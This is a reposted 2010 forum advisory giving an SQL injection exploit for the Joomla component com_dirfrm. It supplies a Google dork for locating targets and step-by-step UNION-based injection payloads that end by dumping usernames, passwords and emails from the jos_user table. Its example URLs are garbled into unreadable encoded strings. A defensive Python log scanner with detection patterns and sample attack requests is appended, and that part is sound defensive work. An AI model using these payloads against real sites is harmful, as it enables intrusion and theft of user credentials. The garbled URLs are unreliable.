[Repost][Recommended] Joomla Component "com_dirfrm" Sql Injection Vulnerability
Posted: 2010-8-18 16:30 2175

Exploit Title : Joomla Component "com_dirfrm" Sql Injection Vulnerability  

# Date : 18 - 8 - 2010  

# Author : Hieuneo (Vietnam)  

# Version : All Versions  

# Tested on : Win 7 Home  

   

###############################################  

Dork google: inurl:"com_dirfrm"  

###############################################  

Exploit:  

0b6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6V1K9i4u0X3M7X3#2Q4x3U0k6@1j5i4y4C8i4K6y4p5L8r3W2K6N6p5q4D9L8q4)9J5y4X3y4S2N6r3W2V1i4K6y4p5i4K6g2n7f1#2q4x3i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.

Injection]&id=8&Itemid=32  

or  

1b3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6V1K9i4u0X3M7X3#2Q4x3U0k6@1j5i4y4C8i4K6y4p5L8r3W2K6N6p5q4D9L8q4)9J5y4X3y4S2N6r3W2V1i4K6y4p5x3g2)9J5y4X3W2V1i4K6y4p5i4K6g2n7f1#2q4x3i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.

Injection]&Itemid=32  

###############################################  

[SQL Injection]:  

-> Step1:  

- order by n--- False  

- order by n+1-- True  

   

-> Step2:null  Union select 1,2,3,4,...,n+1--  

Eg: dcaK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6H3j5i4c8Z5i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2H3K9s2m8Q4x3@1k6G2M7s2c8A6L8$3&6Q4x3@1c8U0L8$3#2Q4y4h3k6V1K9i4u0X3M7X3#2Q4x3U0k6@1j5i4y4C8i4K6y4p5L8r3W2K6N6p5q4D9L8q4)9J5y4X3y4S2N6r3W2V1i4K6y4p5x3g2)9J5y4X3W2V1i4K6y4p5L8Y4g2D9L8q4)9J5y4X3&6T1M7%4m8Q4x3@1u0Q4x3U0k6F1j5Y4y4H3i4K6y4n7

union select 1,2,3,4,5,6,7,8,9,10--&Itemid=32  

   

-> Step3: replace display number on website  

version(), user(), database  

#if version SQL >=5 : try exploit with table system:  

___table_name from information_schema.tables where table_schema=database()--  

___column_name from information_schema.columns where table_name=Char(name table)  

#if version SQL <5: try exploit with blind SQL, blind table_name and column_name  

   

-> Step 4: collecting information  

   

null union select 1,2,3,concat_ws(0x7c,username,password,email) from jos_user--  

   

Done!  

#############Hieuneo@VBF################  

--  

Hieuneo
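
For defenders reviewing web-server logs, the probes in steps 1 to 4 leave recognizable traces in requests routed to `option=com_dirfrm`. The following is an added example, not part of the original advisory: it assumes combined-format access logs, the sample lines are constructed, and `cat` is a hypothetical stand-in for the injected parameter, whose name is not legible on this page.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

NUMERIC_PARAMS = {"id", "itemid"}  # shown as integers in the advisory (id=8, Itemid=32)
# Tokens taken from the advisory's steps 1-4; "--" is the comment terminator it uses.
SQLI_TOKENS = re.compile(
    r"\bunion\b.{0,40}\bselect\b|\border\s+by\s+\d+|information_schema"
    r"|\bconcat(?:_ws)?\s*\(|\b(?:version|user|database)\s*\(|--",
    re.IGNORECASE | re.DOTALL)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')

def decode(value, rounds=2):
    """Undo extra layers of percent-encoding (double-encoding evasion)."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_line(line):
    """Return [(param, reason)] findings for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    params = parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True)
    if not any(k.lower() == "option" and v.lower() == "com_dirfrm" for k, v in params):
        return []  # only requests routed to this component are in scope
    findings = []
    for key, raw in params:  # parse_qsl has already decoded one layer
        value = decode(raw)
        if SQLI_TOKENS.search(value):
            findings.append((key, "sql-token"))
        elif key.lower() in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            findings.append((key, "non-numeric"))
    return findings

# Constructed sample lines; "cat" is a hypothetical parameter name.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Aug/2010:16:30:01 +0000] "GET /index.php?option=com_dirfrm&id=8&Itemid=32 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [18/Aug/2010:16:31:10 +0000] "GET /index.php?option=com_dirfrm&cat=1+order+by+10--&id=8&Itemid=32 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [18/Aug/2010:16:31:40 +0000] "GET /index.php?option=com_dirfrm&cat=null%2520union%2520select%25201,2,3--&Itemid=32 HTTP/1.1" 200 4096',
    "203.0.113.9 - - [18/Aug/2010:16:32:02 +0000] \"GET /index.php?option=com_dirfrm&id=8'&Itemid=32 HTTP/1.1\" 500 312",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(inspect_line(line))
```

The token list is deliberately narrow and will miss obfuscated variants; treat a hit as a lead for review, and treat the non-numeric check on `id` and `Itemid` as the more reliable signal.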
